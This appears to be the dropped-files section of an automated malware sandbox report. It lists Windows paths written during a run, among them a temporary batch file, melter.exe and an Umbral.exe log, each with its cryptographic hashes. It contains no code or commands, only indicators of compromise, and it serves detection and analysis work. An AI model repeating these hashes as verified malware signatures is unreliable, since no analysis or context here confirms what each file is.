SHA256 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96
SHA512 d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Temp\17222.bat

MD5 ab300e6fad94e089d29ee866c57a3a2c
SHA1 8e49ff28b4b0f1d1d2bdb981fc8d1e16ed8e4b84
SHA256 43c11c5f17b8dc6727e8df07cb6bb769cede1a130e53749d856c32c43535605f
SHA512 90a4c6ddb361a35d4515a6f54532cceaf70b82d17355b99fa6143e473ea9d79e1f9c6725b55966505b71f50d2c46f9614d382a73f878527f06ee29c480ae0d88

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

MD5 90be2701c8112bebc6bd58a7de19846e
SHA1 a95be407036982392e2e684fb9ff6602ecad6f1e
SHA256 644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf
SHA512 d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg

MD5 597cf1068c84a5c01afd9472a7453116
SHA1 bc9a638c47aab57b04b2257f421a48b2ee682732
SHA256 0d124f8aedb0b4461c31ee54f6d68ba1288b47c373a9bfe6c1a323e958836799
SHA512 3eaf9c358446ed124817d34523ad6155629f5d4ad11770f918fff6096d1d6f66ee790fac8488b908b424fd4761f0b26011b3e0a2b21bca406f73ca3fe1e17600

C:\Users\Admin\AppData\Local\Temp\melter.exe

MD5 d9baac374cc96e41c9f86c669e53f61c
SHA1 b0ba67bfac3d23e718b3bfdfe120e5446d0229e8
SHA256 a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412
SHA512 4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 893a38fbb6d4135c488cbf6f7c79d240
SHA1 fe68a843b74ae6109f67c2d6d43b29758be6e023
SHA256 2d7ea8169cfc7ab3cd8afc8af5fa62881fb7e687fcaff001d3ff3459439307bb
SHA512 5a394831e27ceee8f53a2e96735f4b3f49a1f35b9a246f23c221bfc74ef21e4a45a8aa2bebc06ee007f28321ea37c0c8c753a70ea0e46a2320a2c19e8f7a97fc

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 77ac7dbd2c295bb2ca42fb20b85bf269
SHA1 8ba917f31545b0d230688eb38d8a27f1926c2e34
SHA256 89f743828c896393415e07772af62acf9691343c73d3684909b8ade755fbf9d1
SHA512 a79af8f4c8fe84212941d455134c4130b9a148283567dfdead7d794bc3ab5ad8765ea180a857771b5ed26fd24883fbbaa316b3010022b2f0e79c559aaedde1b2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

MD5 547df619456b0e94d1b7663cf2f93ccb
SHA1 8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3
SHA256 8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a
SHA512 01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e76b0bfbc116f9025082df79bf7d2196
SHA1 5b4705afc9c4867f21189b8d9dc6cf8cb7950289
SHA256 db1427bace75ef90d0b58f56aed1c49658b27d07647007dd8cfa68a79861382e
SHA512 c9fcb08ec71810ac93a70567958280715b826d6bbbaf38747df64e349b5f7eaf4d423d3ceff48b4087261b5e9df8091d357bb396a51cf11a27405e80d9f5008b

C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_27B7CC8EC38D4CCA834CF42C0CC93BF4.dat

MD5 98b6da4c5e844137802e2af066164ed0
SHA1 0daa9dda66b3e3ab34629e1614f610e312182c12
SHA256 17d07e79e9e6dd505aef614abc8c3123377e56db94892f29602966fee0fc111c
SHA512 b7fb00d6c19ce976adc54087765a96eb3f2d6f0d8475b8b3eca62c37e2ffd1c249ce44e601184cf8fcf6fc350f91a5e2ef48f1966008d444a413f826b14544c9